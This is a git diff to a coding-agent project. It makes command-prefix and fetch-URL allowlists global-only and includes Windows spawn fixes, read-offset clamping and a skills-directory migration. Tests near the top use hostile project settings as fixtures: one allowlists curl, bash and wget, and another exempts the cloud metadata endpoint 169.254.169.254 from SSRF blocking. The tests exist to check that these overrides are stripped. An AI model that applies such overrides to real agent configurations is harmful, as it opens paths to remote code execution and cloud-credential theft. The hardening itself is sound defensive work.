+    assert.equal(sm.getFetchAllowedUrls(), undefined);
+    sm.setFetchAllowedUrls(["internal.company.com"]);
+    assert.deepEqual(sm.getFetchAllowedUrls(), ["internal.company.com"]);
+  });
+
+  it("strips allowedCommandPrefixes from project settings at load time", () => {
+    const { base, agentDir, cwd } = makeTempDirs();
+    tmpBase = base;
+
+    // Global settings: allowedCommandPrefixes = ["sops"]
+    writeFileSync(join(agentDir, "settings.json"), JSON.stringify({
+      allowedCommandPrefixes: ["sops"],
+    }));
+
+    // Malicious project settings trying to override with a dangerous command
+    writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({
+      allowedCommandPrefixes: ["curl", "bash", "wget"],
+    }));
+
+    const sm = SettingsManager.create(cwd, agentDir);
+
+    // The getter reads from globalSettings — project override must be stripped
+    assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops"]);
+  });
+
+  it("strips fetchAllowedUrls from project settings at load time", () => {
+    const { base, agentDir, cwd } = makeTempDirs();
+    tmpBase = base;
+
+    // Global: no fetchAllowedUrls
+    writeFileSync(join(agentDir, "settings.json"), JSON.stringify({}));
+
+    // Project tries to allowlist cloud metadata
+    writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({
+      fetchAllowedUrls: ["metadata.google.internal", "169.254.169.254"],
+    }));
+
+    const sm = SettingsManager.create(cwd, agentDir);
+
+    // Global has none — project override must not leak through
+    assert.equal(sm.getFetchAllowedUrls(), undefined);
+  });
+
+  it("project settings for non-security fields still merge normally", () => {
+    const { base, agentDir, cwd } = makeTempDirs();
+    tmpBase = base;
+
+    writeFileSync(join(agentDir, "settings.json"), JSON.stringify({
+      allowedCommandPrefixes: ["sops"],
+      theme: "dark",
+    }));
+
+    writeFileSync(join(cwd, CONFIG_DIR_NAME, "settings.json"), JSON.stringify({
+      allowedCommandPrefixes: ["curl"],
+      theme: "light",
+      quietStartup: true,
+    }));
+
+    const sm = SettingsManager.create(cwd, agentDir);
+
+    // Security field: global wins
+    assert.deepEqual(sm.getAllowedCommandPrefixes(), ["sops"]);
+    // Normal fields: project overrides global
+    assert.equal(sm.getQuietStartup(), true);
+  });
+});
diff --git a/packages/pi-coding-agent/src/core/settings-manager.ts b/packages/pi-coding-agent/src/core/settings-manager.ts
index 341f27ca0..de75daa0f 100644
--- a/packages/pi-coding-agent/src/core/settings-manager.ts
+++ b/packages/pi-coding-agent/src/core/settings-manager.ts
@@ -151,6 +151,24 @@ export interface Settings {
 	fallback?: FallbackSettings;
 	modelDiscovery?: ModelDiscoverySettings;
 	editMode?: "standard" | "hashline"; // Edit tool mode: "standard" (text match) or "hashline" (LINE#ID anchors). Default: "standard"
+	timestampFormat?: "date-time-iso" | "date-time-us"; // Timestamp display format for messages. Default: "date-time-iso"
+	allowedCommandPrefixes?: string[]; // Override built-in SAFE_COMMAND_PREFIXES for !command resolution (global-only — ignored in project settings)
+	fetchAllowedUrls?: string[]; // Hostnames exempted from SSRF blocklist in fetch_page (global-only — ignored in project settings)
+}
+
+/** Settings keys that are only respected from global config — project settings cannot override these. */
+const GLOBAL_ONLY_KEYS: ReadonlySet<keyof Settings> = new Set([
+	"allowedCommandPrefixes",
+	"fetchAllowedUrls",
+]);
+
+/** Remove global-only keys from a settings object. Applied once at load time. */
+function stripGlobalOnlyKeys(settings: Settings): Settings {
+	const result = { ...settings };
+	for (const key of GLOBAL_ONLY_KEYS) {
+		delete (result as Record<string, unknown>)[key];
+	}
+	return result;
 }
 
 /** Deep merge settings: project/overrides take precedence, nested objects merge recursively */
@@ -303,7 +321,7 @@ export class SettingsManager {
 	) {
 		this.storage = storage;
 		this.globalSettings = initialGlobal;
-		this.projectSettings = initialProject;
+		this.projectSettings = stripGlobalOnlyKeys(initialProject);
 		this.globalSettingsLoadError = globalLoadError;
 		this.projectSettingsLoadError = projectLoadError;
 		this.errors = [...initialErrors];
@@ -440,7 +458,7 @@ export class SettingsManager {
 
 		const projectLoad = SettingsManager.tryLoadFromStorage(this.storage, "project");
 		if (!projectLoad.error) {
-			this.projectSettings = projectLoad.settings;
+			this.projectSettings = stripGlobalOnlyKeys(projectLoad.settings);
 			this.projectSettingsLoadError = null;
 		} else {
 			this.projectSettingsLoadError = projectLoad.error;
@@ -570,7 +588,7 @@ export class SettingsManager {
 	}
 
 	private saveProjectSettings(settings: Settings): void {
-		this.projectSettings = structuredClone(settings);
+		this.projectSettings = stripGlobalOnlyKeys(structuredClone(settings));
 		this.settings = deepMergeSettings(this.globalSettings, this.projectSettings);
 
 		if (this.projectSettingsLoadError) {
@@ -1087,4 +1105,36 @@ export class SettingsManager {
 	setEditMode(mode: "standard" | "hashline"): void {
 		this.setGlobalSetting("editMode", mode);
 	}
+
+	getTimestampFormat(): "date-time-iso" | "date-time-us" {
+		return this.settings.timestampFormat ?? "date-time-iso";
+	}
+
+	setTimestampFormat(format: "date-time-iso" | "date-time-us"): void {
+		this.setGlobalSetting("timestampFormat", format);
+	}
+
+	/**
+	 * Get the allowed command prefixes from global settings only.
+	 * Returns undefined if not configured (caller should use built-in defaults).
+	 */
+	getAllowedCommandPrefixes(): string[] | undefined {
+		return this.globalSettings.allowedCommandPrefixes;
+	}
+
+	setAllowedCommandPrefixes(prefixes: string[]): void {
+		this.setGlobalSetting("allowedCommandPrefixes", prefixes);
+	}
+
+	/**
+	 * Get the fetch URL allowlist from global settings only.
+	 * Returns undefined if not configured (caller should use empty allowlist).
+	 */
+	getFetchAllowedUrls(): string[] | undefined {
+		return this.globalSettings.fetchAllowedUrls;
+	}
+
+	setFetchAllowedUrls(urls: string[]): void {
+		this.setGlobalSetting("fetchAllowedUrls", urls);
+	}
 }
diff --git a/packages/pi-coding-agent/src/core/skills.ts b/packages/pi-coding-agent/src/core/skills.ts
index 9868b1546..a8ab488ef 100644
--- a/packages/pi-coding-agent/src/core/skills.ts
+++ b/packages/pi-coding-agent/src/core/skills.ts
@@ -2,10 +2,28 @@ import { existsSync, readdirSync, readFileSync, realpathSync, statSync } from "f
 import ignore from "ignore";
 import { homedir } from "os";
 import { basename, dirname, isAbsolute, join, relative, resolve, sep } from "path";
-import { CONFIG_DIR_NAME, getAgentDir } from "../config.js";
 import { parseFrontmatter } from "../utils/frontmatter.js";
 import { toPosixPath } from "../utils/path-display.js";
 import type { ResourceDiagnostic } from "./diagnostics.js";
+import { CONFIG_DIR_NAME } from "../config.js";
+
+/**
+ * The standard ecosystem skills directory used by skills.sh and the
+ * Agent Skills standard.  All agents share this location for globally
+ * installed skills.
+ */
+export const ECOSYSTEM_SKILLS_DIR = join(homedir(), ".agents", "skills");
+
+/**
+ * The standard project-level skills directory (`.agents/skills/` relative to cwd).
+ */
+export const ECOSYSTEM_PROJECT_SKILLS_DIR = ".agents";
+
+/**
+ * Legacy skills directory (~/.gsd/agent/skills/ or ~/.pi/agent/skills/).
+ * Read as a fallback so existing installs don't lose skills before migration runs.
+ */
+const LEGACY_SKILLS_DIR = join(homedir(), CONFIG_DIR_NAME, "agent", "skills");
 
 /** Max name length per spec */
 const MAX_NAME_LENGTH = 64;
@@ -331,7 +349,7 @@ function escapeXml(str: string): string {
 export interface LoadSkillsOptions {
 	/** Working directory for project-local skills. Default: process.cwd() */
 	cwd?: string;
-	/** Agent config directory for global skills. Default: ~/.pi/agent */
+	/** @deprecated Skills now use ~/.agents/skills/ exclusively. This option is ignored. */
 	agentDir?: string;
 	/** Explicit skill paths (files or directories) */
 	skillPaths?: string[];
@@ -357,10 +375,7 @@ function resolveSkillPath(p: string, cwd: string): string {
  * Returns skills and any validation diagnostics.
  */
 export function loadSkills(options: LoadSkillsOptions = {}): LoadSkillsResult {
-	const { cwd = process.cwd(), agentDir, skillPaths = [], includeDefaults = true } = options;
-
-	// Resolve agentDir - if not provided, use default from config
-	const resolvedAgentDir = agentDir ?? getAgentDir();
+	const { cwd = process.cwd(), skillPaths = [], includeDefaults = true } = options;
 
 	const skillMap = new Map<string, Skill>();
 	const realPathSet = new Set<string>();
@@ -404,12 +419,22 @@ export function loadSkills(options: LoadSkillsOptions = {}): LoadSkillsResult {
 	}
 
 	if (includeDefaults) {
-		addSkills(loadSkillsFromDirInternal(join(resolvedAgentDir, "skills"), "user", true));
-		addSkills(loadSkillsFromDirInternal(resolve(cwd, CONFIG_DIR_NAME, "skills"), "project", true));
+		// Primary: ~/.agents/skills/ — the industry-standard skills.sh location
+		addSkills(loadSkillsFromDirInternal(ECOSYSTEM_SKILLS_DIR, "user", true));
+		// Primary project: .agents/skills/ — standard project-level location
+		addSkills(loadSkillsFromDirInternal(resolve(cwd, ECOSYSTEM_PROJECT_SKILLS_DIR, "skills"), "project", true));
+
+		// Legacy fallback: read skills from ~/.gsd/agent/skills/ so existing
+		// installs keep working until the one-time migration in resource-loader
+		// copies them to ~/.agents/skills/. Skip if migration has completed.
+		const legacyMigrated = existsSync(join(LEGACY_SKILLS_DIR, ".migrated-to-agents"));
+		if (LEGACY_SKILLS_DIR !== ECOSYSTEM_SKILLS_DIR && existsSync(LEGACY_SKILLS_DIR) && !legacyMigrated) {
+			addSkills(loadSkillsFromDirInternal(LEGACY_SKILLS_DIR, "user", true));
+		}
 	}
 
-	const userSkillsDir = join(resolvedAgentDir, "skills");
-	const projectSkillsDir = resolve(cwd, CONFIG_DIR_NAME, "skills");
+	const userSkillsDir = ECOSYSTEM_SKILLS_DIR;
+	const projectSkillsDir = resolve(cwd, ECOSYSTEM_PROJECT_SKILLS_DIR, "skills");
 
 	const isUnderPath = (target: string, root: string): boolean => {
 		const normalizedRoot = resolve(root);
diff --git a/packages/pi-coding-agent/src/core/slash-commands.ts b/packages/pi-coding-agent/src/core/slash-commands.ts
index beacd41b9..05cbb1f5e 100644
--- a/packages/pi-coding-agent/src/core/slash-commands.ts
+++ b/packages/pi-coding-agent/src/core/slash-commands.ts
@@ -37,5 +37,6 @@ export const BUILTIN_SLASH_COMMANDS: ReadonlyArray<BuiltinSlashCommand> = [
 	{ name: "reload", description: "Reload extensions, skills, prompts, and themes" },
 	{ name: "thinking", description: "Set thinking level (off/minimal/low/medium/high/xhigh)" },
 	{ name: "edit-mode", description: "Toggle edit mode (standard/hashline)" },
+	{ name: "terminal", description: "Run a shell command directly (e.g. /terminal ping -c3 1.1.1.1)" },
 	{ name: "quit", description: "Quit pi" },
 ];
diff --git a/packages/pi-coding-agent/src/core/system-prompt.ts b/packages/pi-coding-agent/src/core/system-prompt.ts
index 310aa9593..f837ae349 100644
--- a/packages/pi-coding-agent/src/core/system-prompt.ts
+++ b/packages/pi-coding-agent/src/core/system-prompt.ts
@@ -84,9 +84,9 @@ export function buildSystemPrompt(options: BuildSystemPromptOptions = {}): strin
 			}
 		}
 
-		// Append skills section (only if read tool is available)
-		const customPromptHasRead = !selectedTools || selectedTools.includes("read");
-		if (customPromptHasRead && skills.length > 0) {
+		// Append skills section (if read or Skill tool is available)
+		const customPromptHasSkillAccess = !selectedTools || selectedTools.includes("read") || selectedTools.includes("Skill");
+		if (customPromptHasSkillAccess && skills.length > 0) {
 			prompt += formatSkillsForPrompt(skills);
 		}
 
@@ -232,8 +232,9 @@ Pi documentation (read only when the user asks about pi itself, its SDK, extensi
 		}
 	}
 
-	// Append skills section (only if read tool is available)
-	if (hasRead && skills.length > 0) {
+	// Append skills section (if read or Skill tool is available)
+	const hasSkill = tools.includes("Skill");
+	if ((hasRead || hasSkill) && skills.length > 0) {
 		prompt += formatSkillsForPrompt(skills);
 	}
 
diff --git a/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts b/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts
new file mode 100644
index 000000000..9247addf2
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/tools/bash-spawn-windows.test.ts
@@ -0,0 +1,101 @@
+/**
+ * bash-spawn-windows.test.ts — Regression test for Windows spawn EINVAL.
+ *
+ * Verifies that bash tool spawn options disable `detached: true` on Windows
+ * to prevent EINVAL errors in ConPTY / VSCode terminal contexts.
+ *
+ * Background:
+ *   On Windows, `spawn()` with `detached: true` sets the
+ *   CREATE_NEW_PROCESS_GROUP flag in CreateProcess.  In certain terminal
+ *   contexts (VSCode integrated terminal, ConPTY, Windows Terminal) this
+ *   flag conflicts with the parent process group and causes a synchronous
+ *   EINVAL from libuv.  The bg-shell extension already guards against this
+ *   with `detached: process.platform !== "win32"` (process-manager.ts);
+ *   this test ensures all other spawn sites are aligned.
+ *
+ * See: gsd-build/gsd-2#XXXX
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { spawn } from "node:child_process";
+
+// Verify the spawn option pattern used across the codebase.
+// This is a static/structural test — it reads the source files and asserts
+// they use the platform-guarded detached flag.
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+const SPAWN_FILES = [
+	join(__dirname, "bash.ts"),
+	join(__dirname, "..", "bash-executor.ts"),
+	join(__dirname, "..", "..", "utils", "shell.ts"),
+];
+
+test("spawn calls use platform-guarded detached flag (no unconditional detached: true)", () => {
+	for (const file of SPAWN_FILES) {
+		const content = readFileSync(file, "utf-8");
+		const lines = content.split("\n");
+
+		for (let i = 0; i < lines.length; i++) {
+			const line = lines[i]!;
+			// Skip comments
+			if (line.trim().startsWith("//") || line.trim().startsWith("*")) continue;
+			// Check for unconditional `detached: true`
+			if (/detached:\s*true\b/.test(line)) {
+				assert.fail(
+					`${file}:${i + 1} has unconditional 'detached: true' — ` +
+					`must use 'detached: process.platform !== "win32"' ` +
+					`to prevent EINVAL on Windows (ConPTY / VSCode terminal)`,
+				);
+			}
+		}
+	}
+});
+
+test("killProcessTree does not use detached: true for taskkill on Windows", () => {
+	const shellFile = join(__dirname, "..", "..", "utils", "shell.ts");
+	const content = readFileSync(shellFile, "utf-8");
+
+	// Find the taskkill spawn call and ensure it doesn't have detached: true
+	const taskkillRegion = content.match(/spawn\("taskkill"[\s\S]*?\}\)/);
+	if (taskkillRegion) {
+		assert.ok(
+			!/detached:\s*true/.test(taskkillRegion[0]),
+			"taskkill spawn should not use detached: true — " +
+			"it can cause EINVAL on Windows and is unnecessary for a utility process",
+		);
+	}
+});
+
+// Smoke test: spawn with platform-guarded detached flag actually works
+test("spawn with detached: process.platform !== 'win32' succeeds", async () => {
+	const { promise, resolve, reject } = Promise.withResolvers<void>();
+
+	const child = spawn(
+		process.platform === "win32" ? "cmd" : "sh",
+		process.platform === "win32" ? ["/c", "echo ok"] : ["-c", "echo ok"],
+		{
+			detached: process.platform !== "win32",
+			stdio: ["ignore", "pipe", "pipe"],
+		},
+	);
+
+	let output = "";
+	child.stdout?.on("data", (d: Buffer) => { output += d.toString(); });
+	child.on("error", reject);
+	child.on("close", (code) => {
+		try {
+			assert.equal(code, 0, "spawn should succeed");
+			assert.ok(output.trim().includes("ok"), `Expected 'ok' in output, got: ${output}`);
+			resolve();
+		} catch (e) {
+			reject(e);
+		}
+	});
+
+	await promise;
+});
diff --git a/packages/pi-coding-agent/src/core/tools/bash.ts b/packages/pi-coding-agent/src/core/tools/bash.ts
index 4e1d65257..eccda574b 100644
--- a/packages/pi-coding-agent/src/core/tools/bash.ts
+++ b/packages/pi-coding-agent/src/core/tools/bash.ts
@@ -158,9 +158,13 @@ const defaultBashOperations: BashOperations = {
 				return;
 			}
 
+			// On Windows, detached: true sets CREATE_NEW_PROCESS_GROUP which can
+			// cause EINVAL in VSCode/ConPTY terminal contexts.  The bg-shell
+			// extension already guards this (process-manager.ts); align here.
+			// Process-tree cleanup uses taskkill /F /T on Windows regardless.
 			const child = spawn(shell, [...args, command], {
 				cwd,
-				detached: true,
+				detached: process.platform !== "win32",
 				env: env ?? getShellEnv(),
 				stdio: ["ignore", "pipe", "pipe"],
 			});
diff --git a/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts b/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts
index 532289f11..b7272559e 100644
--- a/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts
+++ b/packages/pi-coding-agent/src/core/tools/edit-diff.test.ts
@@ -60,26 +60,26 @@ describe("edit-diff", () => {
 		assert.match(result.diff, /CHANGED/);
 	});
 
-	it("computes diffs for preview without native helpers", async () => {
+	it("computes diffs for preview without native helpers", async (t) => {
 		const dir = mkdtempSync(join(tmpdir(), "edit-diff-test-"));
-		try {
-			const file = join(dir, "sample.ts");
-			writeFileSync(file, "const title = “Hello”;\n", "utf-8");
-
-			const result = await computeEditDiff(
-				file,
-				"const title = \"Hello\";\n",
-				"const title = \"Hi\";\n",
-				dir,
-			);
-
-			assert.ok(!("error" in result), "expected a diff result");
-			if (!("error" in result)) {
-				assert.equal(result.firstChangedLine, 1);
-				assert.match(result.diff, /\+1 const title = "Hi";/);
-			}
-		} finally {
+		t.after(() => {
 			rmSync(dir, { recursive: true, force: true });
+		});
+
+		const file = join(dir, "sample.ts");
+		writeFileSync(file, "const title = “Hello”;\n", "utf-8");
+
+		const result = await computeEditDiff(
+			file,
+			"const title = \"Hello\";\n",
+			"const title = \"Hi\";\n",
+			dir,
+		);
+
+		assert.ok(!("error" in result), "expected a diff result");
+		if (!("error" in result)) {
+			assert.equal(result.firstChangedLine, 1);
+			assert.match(result.diff, /\+1 const title = "Hi";/);
 		}
 	});
 });
diff --git a/packages/pi-coding-agent/src/core/tools/hashline-read.ts b/packages/pi-coding-agent/src/core/tools/hashline-read.ts
index fc2da81eb..f7d944d14 100644
--- a/packages/pi-coding-agent/src/core/tools/hashline-read.ts
+++ b/packages/pi-coding-agent/src/core/tools/hashline-read.ts
@@ -123,12 +123,15 @@ export function createHashlineReadTool(cwd: string, options?: HashlineReadToolOp
 								const allLines = textContent.split("\n");
 								const totalFileLines = allLines.length;
 
-								const startLine = offset ? Math.max(0, offset - 1) : 0;
-								const startLineDisplay = startLine + 1;
+								let startLine = offset ? Math.max(0, offset - 1) : 0;
 
+								// Clamp offset to file bounds instead of throwing (#3007)
+								let offsetClamped = false;
 								if (startLine >= allLines.length) {
-									throw new Error(`Offset ${offset} is beyond end of file (${allLines.length} lines total)`);
+									startLine = Math.max(0, allLines.length - 1);
+									offsetClamped = true;
 								}
+								const startLineDisplay = startLine + 1;
 
 								let selectedContent: string;
 								let userLimitedLines: number | undefined;
@@ -172,6 +175,11 @@ export function createHashlineReadTool(cwd: string, options?: HashlineReadToolOp
 									outputText = formatHashLines(truncation.content, startLineDisplay);
 								}
 
+								// Prepend clamp notice so the agent knows offset was adjusted
+								if (offsetClamped) {
+									outputText = `[Offset ${offset} beyond end of file (${totalFileLines} lines). Clamped to line ${startLineDisplay}.]\n\n${outputText}`;
+								}
+
 								content = [{ type: "text", text: outputText }];
 							}
 
diff --git a/packages/pi-coding-agent/src/core/tools/read.ts b/packages/pi-coding-agent/src/core/tools/read.ts
index c2f23e60a..309e43b57 100644
--- a/packages/pi-coding-agent/src/core/tools/read.ts
+++ b/packages/pi-coding-agent/src/core/tools/read.ts
@@ -133,13 +133,18 @@ export function createReadTool(cwd: string, options?: ReadToolOptions): AgentToo
 								const totalFileLines = allLines.length;
 
 								// Apply offset if specified (1-indexed to 0-indexed)
-								const startLine = offset ? Math.max(0, offset - 1) : 0;
-								const startLineDisplay = startLine + 1; // For display (1-indexed)
+								let startLine = offset ? Math.max(0, offset - 1) : 0;
 
-								// Check if offset is out of bounds
+								// Clamp offset to file bounds instead of throwing (#3007).
+								// When an agent requests offset:30 on a 13-line file, return
+								// the last line with a notice rather than an error that
+								// propagates as invalid JSON downstream.
+								let offsetClamped = false;
 								if (startLine >= allLines.length) {
-									throw new Error(`Offset ${offset} is beyond end of file (${allLines.length} lines total)`);
+									startLine = Math.max(0, allLines.length - 1);
+									offsetClamped = true;
 								}
+								const startLineDisplay = startLine + 1; // For display (1-indexed)
 
 								// If limit is specified by user, use it; otherwise we'll let truncateHead decide
 								let selectedContent: string;
@@ -187,6 +192,11 @@ export function createReadTool(cwd: string, options?: ReadToolOptions): AgentToo
 									outputText = truncation.content;
 								}
 
+								// Prepend clamp notice so the agent knows offset was adjusted
+								if (offsetClamped) {
+									outputText = `[Offset ${offset} beyond end of file (${totalFileLines} lines). Clamped to line ${startLineDisplay}.]\n\n${outputText}`;
+								}
+
 								content = [{ type: "text", text: outputText }];
 							}
 
diff --git a/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts b/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts
new file mode 100644
index 000000000..a7929a1dd
--- /dev/null
+++ b/packages/pi-coding-agent/src/core/tools/spawn-shell-windows.test.ts
@@ -0,0 +1,92 @@
+/**
+ * spawn-shell-windows.test.ts — Regression test for Windows spawn ENOENT/EINVAL.
+ *
+ * On Windows, npm/npx/tsc and other tools are installed as .cmd batch scripts.
+ * Node's `spawn()` without `shell: true` cannot execute .cmd files, resulting
+ * in ENOENT or EINVAL errors. Every spawn site that may invoke a user-installed
+ * binary (not `node` or a shell like `sh`/`bash`/`cmd`) must include
+ * `shell: process.platform === "win32"` so the call is resolved through cmd.exe
+ * on Windows while remaining a direct exec on POSIX.
+ *
+ * This test structurally scans all spawn sites and verifies the guard is present.
+ *
+ * Fixes: gsd-build/gsd-2#2854
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname, relative } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const coreDir = join(__dirname, "..");
+
+/**
+ * Files that call `spawn()` with a user-facing binary (not `node`, `sh`, `bash`,
+ * or `cmd`) and therefore need the Windows shell guard.
+ *
+ * If a file spawns only hardcoded system binaries (like `node` in rpc-client.ts),
+ * it does not need the guard and should NOT appear here.
+ */
+const SPAWN_FILES_NEEDING_SHELL_GUARD = [
+	// Extension's GSD client — spawns the `gsd` binary which is a .cmd on Windows
+	join(coreDir, "..", "..", "..", "vscode-extension", "src", "gsd-client.ts"),
+	// exec.ts — used by extensions to run arbitrary commands
+	join(coreDir, "exec.ts"),
+	// LSP index — spawns project-type commands (tsc, cargo, etc.)
+	join(coreDir, "lsp", "index.ts"),
+	// LSP client — spawns LSP server binaries (npx, etc.)
+	join(coreDir, "lsp", "client.ts"),
+	// LSP mux — spawns lspmux binary
+	join(coreDir, "lsp", "lspmux.ts"),
+	// Package manager — spawns npm/yarn/pnpm
+	join(coreDir, "package-manager.ts"),
+];
+
+test("all spawn sites that invoke user-facing binaries include shell: process.platform === 'win32'", () => {
+	const failures: string[] = [];
+
+	for (const file of SPAWN_FILES_NEEDING_SHELL_GUARD) {
+		let content: string;
+		try {
+			content = readFileSync(file, "utf-8");
+		} catch {
+			// File may not exist in this checkout — skip
+			continue;
+		}
+
+		const lines = content.split("\n");
+
+		// Find all spawn(..., { ... }) call sites and check each one
+		// for the presence of `shell: process.platform === "win32"` within
+		// 5 lines after the spawn call.
+		for (let i = 0; i < lines.length; i++) {
+			const line = lines[i]!;
+			// Skip comments
+			if (line.trim().startsWith("//") || line.trim().startsWith("*")) continue;
+
+			// Detect a spawn() call
+			if (/\bspawn\(/.test(line)) {
+				// Look ahead up to 8 lines for the shell guard
+				const lookahead = lines.slice(i, i + 8).join("\n");
+				const hasShellGuard =
+					/shell:\s*process\.platform\s*===\s*["']win32["']/.test(lookahead);
+
+				if (!hasShellGuard) {
+					const relPath = relative(join(coreDir, "..", ".."), file);
+					failures.push(`${relPath}:${i + 1}`);
+				}
+			}
+		}
+	}
+
+	assert.deepEqual(
+		failures,
+		[],
+		`The following spawn sites are missing 'shell: process.platform === "win32"':\n` +
+		failures.map(f => `  - ${f}`).join("\n") +
+		`\nOn Windows, .cmd wrapper scripts (npm, npx, tsc, gsd) require shell ` +
+		`resolution. Without this guard, spawn fails with ENOENT or EINVAL.`,
+	);
+});
diff --git a/packages/pi-coding-agent/src/index.ts b/packages/pi-coding-agent/src/index.ts
index 882f92e5b..86686caf0 100644
--- a/packages/pi-coding-agent/src/index.ts
+++ b/packages/pi-coding-agent/src/index.ts
@@ -68,6 +68,7 @@ export type {
 	Extension,
 	ExtensionActions,
 	ExtensionAPI,
+	ExtensionManifest,
 	ExtensionCommandContext,
 	ExtensionCommandContextActions,
 	ExtensionContext,
@@ -94,6 +95,11 @@ export type {
 	MessageRenderOptions,
 	ProviderConfig,
 	ProviderModelConfig,
+	LifecycleHookContext,
+	LifecycleHookHandler,
+	LifecycleHookMap,
+	LifecycleHookPhase,
+	LifecycleHookScope,
 	ReadToolCallEvent,
 	RegisteredCommand,
 	RegisteredTool,
@@ -114,12 +120,16 @@ export type {
 	ToolCallEvent,
 	ToolDefinition,
 	ToolInfo,
+	SortResult,
+	SortWarning,
 	ToolRenderResultOptions,
 	ToolResultEvent,
 	TurnEndEvent,
 	TurnStartEvent,
 	UserBashEvent,
 	UserBashEventResult,
+	BashTransformEvent,
+	BashTransformEventResult,
 	WidgetPlacement,
 	WriteToolCallEvent,
 } from "./core/extensions/index.js";
@@ -130,6 +140,9 @@ export {
 	importExtensionModule,
 	isToolCallEventType,
 	isToolResultEventType,
+	readManifest,
+	readManifestFromEntryPath,
+	sortExtensionPaths,
 	wrapRegisteredTool,
 	wrapRegisteredTools,
 	wrapToolsWithExtensions,
@@ -152,6 +165,8 @@ export type {
 	ResolvedResource,
 } from "./core/package-manager.js";
 export { DefaultPackageManager } from "./core/package-manager.js";
+export type { PackageCommand, PackageCommandOptions, PackageCommandRunnerOptions, PackageCommandRunnerResult } from "./core/package-commands.js";
+export { getPackageCommandUsage, parsePackageCommand, runPackageCommand } from "./core/package-commands.js";
 export type { ResourceCollision, ResourceDiagnostic, ResourceLoader } from "./core/resource-loader.js";
 export { DefaultResourceLoader } from "./core/resource-loader.js";
 // SDK for programmatic usage
@@ -210,8 +225,15 @@ export {
 	SettingsManager,
 	type TaskIsolationSettings,
 } from "./core/settings-manager.js";
+export {
+	SAFE_COMMAND_PREFIXES,
+	setAllowedCommandPrefixes,
+	getAllowedCommandPrefixes,
+} from "./core/resolve-config-value.js";
 // Skills
 export {
+	ECOSYSTEM_SKILLS_DIR,
+	ECOSYSTEM_PROJECT_SKILLS_DIR,
 	formatSkillsForPrompt,
 	getLoadedSkills,
 	type LoadSkillsFromDirOptions,
@@ -303,8 +325,11 @@ export {
 	type RpcClientOptions,
 	type RpcEventListener,
 	type RpcCommand,
+	type RpcInitResult,
+	type RpcProtocolVersion,
 	type RpcResponse,
 	type RpcSessionState,
+	type RpcV2Event,
 } from "./modes/index.js";
 // RPC JSONL utilities
 export { attachJsonlLineReader, serializeJsonLine } from "./modes/rpc/jsonl.js";
diff --git a/packages/pi-coding-agent/src/main.ts b/packages/pi-coding-agent/src/main.ts
index 1f1c961e0..4416043cc 100644
--- a/packages/pi-coding-agent/src/main.ts
+++ b/packages/pi-coding-agent/src/main.ts
@@ -20,6 +20,7 @@ import type { LoadExtensionsResult } from "./core/extensions/index.js";
 import { KeybindingsManager } from "./core/keybindings.js";
 import { ModelRegistry } from "./core/model-registry.js";
 import { resolveCliModel, resolveModelScope, type ScopedModel } from "./core/model-resolver.js";
+import { runPackageCommand } from "./core/package-commands.js";
 import { DefaultPackageManager } from "./core/package-manager.js";
 import { DefaultResourceLoader } from "./core/resource-loader.js";
 import { type CreateAgentSessionOptions, createAgentSession } from "./core/sdk.js";
@@ -69,237 +70,6 @@ function isTruthyEnvFlag(value: string | undefined): boolean {
 	return value === "1" || value.toLowerCase() === "true" || value.toLowerCase() === "yes";
 }
 
-type PackageCommand = "install" | "remove" | "update" | "list";
-
-interface PackageCommandOptions {
-	command: PackageCommand;
-	source?: string;
-	local: boolean;
-	help: boolean;
-	invalidOption?: string;
-}
-
-function getPackageCommandUsage(command: PackageCommand): string {
-	switch (command) {
-		case "install":
-			return `${APP_NAME} install <source> [-l]`;
-		case "remove":
-			return `${APP_NAME} remove <source> [-l]`;
-		case "update":
-			return `${APP_NAME} update [source]`;
-		case "list":
-			return `${APP_NAME} list`;
-	}
-}
-
-function printPackageCommandHelp(command: PackageCommand): void {
-	switch (command) {
-		case "install":
-			console.log(`${chalk.bold("Usage:")}
-  ${getPackageCommandUsage("install")}
-
-Install a package and add it to settings.
-
-Options:
-  -l, --local    Install project-locally (.pi/settings.json)
-
-Examples:
-  ${APP_NAME} install npm:@foo/bar
-  ${APP_NAME} install git:github.com/user/repo
-  ${APP_NAME} install git:git@github.com:user/repo
-  ${APP_NAME} install https://github.com/user/repo
-  ${APP_NAME} install ssh://git@github.com/user/repo
-  ${APP_NAME} install ./local/path
-`);
-			return;
-
-		case "remove":
-			console.log(`${chalk.bold("Usage:")}
-  ${getPackageCommandUsage("remove")}
-
-Remove a package and its source from settings.
-
-Options:
-  -l, --local    Remove from project settings (.pi/settings.json)
-
-Example:
-  ${APP_NAME} remove npm:@foo/bar
-`);
-			return;
-
-		case "update":
-			console.log(`${chalk.bold("Usage:")}
-  ${getPackageCommandUsage("update")}
-
-Update installed packages.
-If <source> is provided, only that package is updated.
-`);
-			return;
-
-		case "list":
-			console.log(`${chalk.bold("Usage:")}
-  ${getPackageCommandUsage("list")}
-
-List installed packages from user and project settings.
-`);
-			return;
-	}
-}
-
-function parsePackageCommand(args: string[]): PackageCommandOptions | undefined {
-	const [command, ...rest] = args;
-	if (command !== "install" && command !== "remove" && command !== "update" && command !== "list") {
-		return undefined;
-	}
-
-	let local = false;
-	let help = false;
-	let invalidOption: string | undefined;
-	let source: string | undefined;
-
-	for (const arg of rest) {
-		if (arg === "-h" || arg === "--help") {
-			help = true;
-			continue;
-		}
-
-		if (arg === "-l" || arg === "--local") {
-			if (command === "install" || command === "remove") {
-				local = true;
-			} else {
-				invalidOption = invalidOption ?? arg;
-			}
-			continue;
-		}
-
